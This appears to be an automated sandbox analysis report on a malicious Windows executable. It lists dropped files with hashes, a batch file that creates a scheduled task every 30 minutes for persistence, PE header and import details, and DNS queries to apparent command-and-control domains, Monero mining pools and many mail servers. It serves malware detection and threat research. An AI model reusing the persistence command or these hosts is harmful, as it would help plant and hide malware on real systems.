Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	186368
Entropy (8bit):	7.118131966034216
Encrypted:	false
SSDEEP:	3072:Z+dRE4pt7joEHSYMv5DHfcSi9gj9TtKz/bOsKcl:c4+t7MdFhjfcnyBtq6U
MD5:	27284482B63B322A0877B1E4F51702FB
SHA1:	179FA862C24B82BC7F168C9DA0A41CA2633A31E1
SHA-256:	F4E79FFC5C3485ED38879624164F32F3855DEA2427A4648C557B442A1373F3BE
SHA-512:	2EB4045CAAB7500C54B6B8CBDA575185AD9E25AAFEC37FA565077CABA230C77DCB6E7952D94CF1ACFA3720B0F9A4969524981179E7487E64231D7079456A4253
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`.\$K..$K..$K..K=..=K..K=$.7K..K=..HK..-3).#K..$K..LK..K=..%K..K= .%K..K='.%K..Rich$K..................PE..L....Id.................V....?..............p....@..........................0B.................................................P.....B..&...........................................................................p...............................text...nT.......V.................. ..`.rdata...)...p......Z..............@..@.data...,_?......,..................@....rsrc....&....B..(..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsvCB06.tmp\INetC.dll

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.391050633650523
Encrypted:	false
SSDEEP:	384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
MD5:	40D7ECA32B2F4D29DB98715DD45BFAC5
SHA1:	124DF3F617F562E46095776454E1C0C7BB791CC7
SHA-256:	85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
SHA-512:	5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Temp\Task.bat

Process:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	4.797757447689461
Encrypted:	false
SSDEEP:	3:HFUuvaOpLKBchEXEtTC5WAuN+E2J5xAIEyrKBySKFS3:Ogas7SXEFAuN723faKS3
MD5:	467322334BC9A78A5E8C16164C4CFA5E
SHA1:	F8EA2C7B5BB81F45C1A4AB4CBA90A29FC60868E6
SHA-256:	5061C3009CC21C72B82EDA2440994EFC0C972F387244E5A4CC0A6DDFA0F8EECA
SHA-512:	441F536C169F90BBB8185366DA91837B892D06BBA1E413956D3D1507E12BA4D9E34A616D2920B3619A7811D1D7AC065A114280A72AFF5D0F3B180CAEA7E64C3F
Malicious:	false
Reputation:	unknown
Preview:	chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

C:\Users\user\AppData\Roaming\ccjteug

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.746080905995439
Encrypted:	false
SSDEEP:	3072:EtfzKZ7yFAT0c0Y2X6U0dpB9bmmqHPCVOUWns6j:SrM2FwB0YuXkpB9bl5Vs
MD5:	514F0B1D15418DCC5785C2F6CA4A0658
SHA1:	3C63898265B97CD2C30B5C041EA968F2057EEEAB
SHA-256:	A545B036DB22261EDAB9698A1CB5F1D6C74D4FF051530C585DF0C5230F5941DF
SHA-512:	F180C84ED84936493EEF82AB031BC3E5097587A66C03503845691438219E5CE45AC1979BEC1BFD6DCE6AD0B48FCF4C017A2FAD5DACB7DD6EFF873FCE4B015359
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.h.............p.......p.......p...t...............w...p.......p.......p.......Rich............PE..L....Z.c......................?...................@...........................A......4..........................................P....`A..&...........................................................................................................text............................... ..`.rdata...).......*..................@..@.data...,_?......,..................@....rsrc....&...`A..(..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ccjteug:Zone.Identifier

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\usjteug

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	142848
Entropy (8bit):	6.729229199717194
Encrypted:	false
SSDEEP:	1536:tsXyFCHNHsDn7efMtblIRG+snWQFqkVrT9kTcFp0Yv29vW/K5XDve8IwjO1B+coA:uXiCHNlfJOQIrCQFq02FjTDjGBEHLn8
MD5:	4EFCEC7DF29A58ED31415372388D2824
SHA1:	57E9B5C26326EF791D3584E04A04B9A110AD6E60
SHA-256:	6DC26F797D26E14A93608FB681115C1EE3583A9796A9382DF3F7EA466E39866C
SHA-512:	10F386963195E41628073750B4AFE4CE53F569C802D98517CE119B1E14EA06F65BA6375C09BF967152DCA49A3E393C6D6B2F968CD5034EB4E20839355F3C4CAD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.h.............p.......p.......p...t...............w...p.......p.......p.......Rich............PE..L....7\c......................?...................@...........................A.................................................P....PA..&...........................................................................................................text.............................. ..`.rdata...).......*..................@..@.data...,_?......,..................@....rsrc....&...PA..(..................@..@................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.746080905995439
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MCYq2AqNU0.exe
File size:	144'384 bytes
MD5:	514f0b1d15418dcc5785c2f6ca4a0658
SHA1:	3c63898265b97cd2c30b5c041ea968f2057eeeab
SHA256:	a545b036db22261edab9698a1cb5f1d6c74d4ff051530c585df0c5230f5941df
SHA512:	f180c84ed84936493eef82ab031bc3e5097587a66c03503845691438219e5ce45ac1979bec1bfd6dce6ad0b48fcf4c017a2fad5dacb7dd6eff873fce4b015359
SSDEEP:	3072:EtfzKZ7yFAT0c0Y2X6U0dpB9bmmqHPCVOUWns6j:SrM2FwB0YuXkpB9bl5Vs
TLSH:	6AE3CF2573E0D0B1D893257194B8D6B25A7EF8B116B4414BBB983B3E2FB03C08E79356
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.h.............p.......p.......p...t...............w...p.......p.......p.......Rich............PE..L....Z.c...................

File Icon


Icon Hash:	033165616d311a46

Static PE Info

General

Entrypoint:	0x4015af
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63AB5A19 [Tue Dec 27 20:48:25 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	eb8c844ad14da407481e1c81cd466558

Entrypoint Preview

Instruction
call 00007F0125658BEFh
jmp 00007F0125655CEEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00422138h], eax
mov dword ptr [00422134h], ecx
mov dword ptr [00422130h], edx
mov dword ptr [0042212Ch], ebx
mov dword ptr [00422128h], esi
mov dword ptr [00422124h], edi
mov word ptr [00422150h], ss
mov word ptr [00422144h], cs
mov word ptr [00422120h], ds
mov word ptr [0042211Ch], es
mov word ptr [00422118h], fs
mov word ptr [00422114h], gs
pushfd
pop dword ptr [00422148h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0042213Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00422140h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0042214Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00422088h], 00010001h
mov eax, dword ptr [00422140h]
mov dword ptr [0042203Ch], eax
mov dword ptr [00422030h], C0000409h
mov dword ptr [00422034h], 00000001h
mov eax, dword ptr [00420004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00420008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C8h]

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f094	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x416000	0x26d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b18e	0x1b200	98be207783515ea5b01a4047bb1966ab	False	0.7610167050691244	data	7.322639038806439	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1d000	0x2998	0x2a00	9f6f8968f15832106856db3e66874bf9	False	0.35928199404761907	data	4.920637926915667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x20000	0x3f5f2c	0x2c00	a5696ccf921a02ea49a72c6d7b6c9182	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x416000	0x26d0	0x2800	368f68a3127bd91e4aa5baf39381565b	False	0.52568359375	data	4.757775424535593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x417358	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.75
RT_CURSOR	0x4174a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.31023454157782515
RT_ICON	0x416270	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.7227954971857411
RT_STRING	0x418518	0x1b4	data	English	United States	0.5229357798165137
RT_ACCELERATOR	0x417330	0x28	data	English	United States	1.0
RT_GROUP_CURSOR	0x417490	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x418350	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x417318	0x14	data	English	United States	1.1
RT_VERSION	0x418368	0x1b0	data	English	United States	0.5810185185185185

Imports

DLL	Import
KERNEL32.dll	GetComputerNameA, LocalUnlock, WriteConsoleOutputCharacterA, InterlockedDecrement, GetSystemDefaultLCID, GetConsoleAliasesLengthA, TzSpecificLocalTimeToSystemTime, GetProcessTimes, LoadLibraryW, GetLocaleInfoW, FatalAppExitW, SetConsoleCP, HeapDestroy, ReplaceFileA, FlushFileBuffers, CreateDirectoryA, GetConsoleAliasesW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, CreateNamedPipeA, SetStdHandle, PrepareTape, ResetEvent, LoadLibraryA, LocalAlloc, AddAtomA, DebugSetProcessKillOnExit, lstrcatW, VirtualProtect, GetCurrentDirectoryA, EnumDateFormatsW, FileTimeToLocalFileTime, SetFileAttributesW, GetVolumeInformationW, WriteConsoleW, CloseHandle, SetFilePointer, GetConsoleMode, GetConsoleCP, HeapAlloc, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, Sleep, HeapSize, EnterCriticalSection, LeaveCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, GetLastError, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CreateFileW
USER32.dll	GetForegroundWindow, GetClassLongA
ole32.dll	CreateDataAdviseHolder

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 21, 2024 00:22:23.291245937 CET	192.168.2.6	1.1.1.1	0xc173	Standard query (0)	selebration17io.io	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:36.487135887 CET	192.168.2.6	1.1.1.1	0x6271	Standard query (0)	isotrimorphicnongrasse.shop	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:37.303708076 CET	192.168.2.6	1.1.1.1	0x124c	Standard query (0)	resergvearyinitiani.shop	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:38.328542948 CET	192.168.2.6	1.1.1.1	0x124c	Standard query (0)	resergvearyinitiani.shop	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:41.193403959 CET	192.168.2.6	1.1.1.1	0x1569	Standard query (0)	trmpc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:42.200403929 CET	192.168.2.6	1.1.1.1	0x1569	Standard query (0)	trmpc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.244504929 CET	192.168.2.6	1.1.1.1	0x1569	Standard query (0)	trmpc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:45.899697065 CET	192.168.2.6	1.1.1.1	0x8aa9	Standard query (0)	mobile.sunaviat.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:12.846296072 CET	192.168.2.6	1.1.1.1	0x42e4	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:13.837311983 CET	192.168.2.6	1.1.1.1	0x42e4	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:14.852899075 CET	192.168.2.6	1.1.1.1	0x42e4	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:27.160545111 CET	192.168.2.6	1.1.1.1	0x5141	Standard query (0)	wearethebestin2024.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.611884117 CET	192.168.2.6	1.1.1.1	0x684b	Standard query (0)	xmr-eu2.nanopool.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:30.813391924 CET	192.168.2.6	1.1.1.1	0x5825	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.760502100 CET	192.168.2.6	1.1.1.1	0xeb30	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:24:59.610311031 CET	192.168.2.6	91.211.247.248	0x4b05	Standard query (0)	bvstlyb.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:54.042387009 CET	192.168.2.6	1.1.1.1	0x96d7	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:55.056237936 CET	192.168.2.6	1.1.1.1	0x96d7	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.071928978 CET	192.168.2.6	1.1.1.1	0x96d7	Standard query (0)	sjyey.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:01.173253059 CET	192.168.2.6	1.1.1.1	0x98fd	Standard query (0)	att.com.au	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.173969984 CET	192.168.2.6	1.1.1.1	0xc164	Standard query (0)	derbyron.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.174527884 CET	192.168.2.6	1.1.1.1	0x98e7	Standard query (0)	glazing-bt.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.175178051 CET	192.168.2.6	1.1.1.1	0x57b7	Standard query (0)	hotmail.fr.br	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.175662994 CET	192.168.2.6	1.1.1.1	0x1110	Standard query (0)	att.com.tw	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.176424980 CET	192.168.2.6	1.1.1.1	0x116a	Standard query (0)	hotmail.fr.au	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.176808119 CET	192.168.2.6	1.1.1.1	0x5c3a	Standard query (0)	mhcosta.gotadsl.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.177427053 CET	192.168.2.6	1.1.1.1	0x59cf	Standard query (0)	mlbx.matrix.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.177861929 CET	192.168.2.6	1.1.1.1	0x2f2f	Standard query (0)	wefttechnologies.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.178556919 CET	192.168.2.6	1.1.1.1	0xc113	Standard query (0)	braekling.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.178966999 CET	192.168.2.6	1.1.1.1	0xa7a0	Standard query (0)	hotmail.fr.tr	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.179377079 CET	192.168.2.6	1.1.1.1	0x1c01	Standard query (0)	scw-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.179812908 CET	192.168.2.6	1.1.1.1	0xefd2	Standard query (0)	voltage-distribution.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.180438995 CET	192.168.2.6	1.1.1.1	0x35f6	Standard query (0)	cfca.eu	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.180869102 CET	192.168.2.6	1.1.1.1	0xfeed	Standard query (0)	d-brinkmann.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.181402922 CET	192.168.2.6	1.1.1.1	0x8432	Standard query (0)	breecetechnology.co.za	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.181898117 CET	192.168.2.6	1.1.1.1	0x76dd	Standard query (0)	kvapilova.net	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.182389021 CET	192.168.2.6	1.1.1.1	0xe259	Standard query (0)	iisalessandrini.it	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.182768106 CET	192.168.2.6	1.1.1.1	0xf482	Standard query (0)	schupp-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.183146000 CET	192.168.2.6	1.1.1.1	0x5929	Standard query (0)	heinzerlinghotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.183850050 CET	192.168.2.6	1.1.1.1	0xf829	Standard query (0)	generika-apotheke-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.185229063 CET	192.168.2.6	1.1.1.1	0xcc2c	Standard query (0)	igs-ruelzheim.rp.lo-net2.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.185538054 CET	192.168.2.6	1.1.1.1	0x1380	Standard query (0)	b4l-clan.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.185862064 CET	192.168.2.6	1.1.1.1	0x755f	Standard query (0)	esafrica.co.zw	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.186242104 CET	192.168.2.6	1.1.1.1	0x6c55	Standard query (0)	hotmailhome.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.186538935 CET	192.168.2.6	1.1.1.1	0xb955	Standard query (0)	att.com.sg	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.187011957 CET	192.168.2.6	1.1.1.1	0xeaf8	Standard query (0)	outlook.fr.sg	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.187376976 CET	192.168.2.6	1.1.1.1	0x8a77	Standard query (0)	att.com.ph	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.187947989 CET	192.168.2.6	1.1.1.1	0x3919	Standard query (0)	cpsgroupe.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.188416958 CET	192.168.2.6	1.1.1.1	0x339	Standard query (0)	terminatour-bohotmailing.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.189008951 CET	192.168.2.6	1.1.1.1	0x6f2c	Standard query (0)	hotmailjoy.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.189385891 CET	192.168.2.6	1.1.1.1	0xe093	Standard query (0)	hotmail.demail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.189784050 CET	192.168.2.6	1.1.1.1	0x4409	Standard query (0)	touktoukcie.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.190419912 CET	192.168.2.6	1.1.1.1	0x1729	Standard query (0)	hotmail.fr.ar	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.190853119 CET	192.168.2.6	1.1.1.1	0xd44d	Standard query (0)	markoren.no	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.191230059 CET	192.168.2.6	1.1.1.1	0xb421	Standard query (0)	eyegage.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.191636086 CET	192.168.2.6	1.1.1.1	0x52ca	Standard query (0)	att.co.id	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.192229033 CET	192.168.2.6	1.1.1.1	0xc6ee	Standard query (0)	schussundtor.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.192615986 CET	192.168.2.6	1.1.1.1	0x5d9	Standard query (0)	rubypink.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.193101883 CET	192.168.2.6	1.1.1.1	0xa84c	Standard query (0)	hotmail-topmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.193548918 CET	192.168.2.6	1.1.1.1	0x15c3	Standard query (0)	ksv-schwimmen.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.193918943 CET	192.168.2.6	1.1.1.1	0xa528	Standard query (0)	newhotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.194303036 CET	192.168.2.6	1.1.1.1	0x997f	Standard query (0)	waukesha-water.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.194876909 CET	192.168.2.6	1.1.1.1	0x61b4	Standard query (0)	fortressrealcapital.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.195262909 CET	192.168.2.6	1.1.1.1	0xb8e7	Standard query (0)	amsantechnology.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.195724010 CET	192.168.2.6	1.1.1.1	0x48d	Standard query (0)	hotmail.fryahoo.fr	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.196212053 CET	192.168.2.6	1.1.1.1	0x559	Standard query (0)	tux4hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.197390079 CET	192.168.2.6	1.1.1.1	0xc0e4	Standard query (0)	radiussystemllc.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.197994947 CET	192.168.2.6	1.1.1.1	0xe86b	Standard query (0)	att.com.hk	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.198535919 CET	192.168.2.6	1.1.1.1	0xb1e3	Standard query (0)	acidvision.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.198966026 CET	192.168.2.6	1.1.1.1	0x955f	Standard query (0)	mwpmedia.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.199414015 CET	192.168.2.6	1.1.1.1	0x472d	Standard query (0)	creativ-moebelwerkstaetten.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.199829102 CET	192.168.2.6	1.1.1.1	0x7ef8	Standard query (0)	utlohotmail.de	MX (Mail exchange)	IN (0x0001)	false
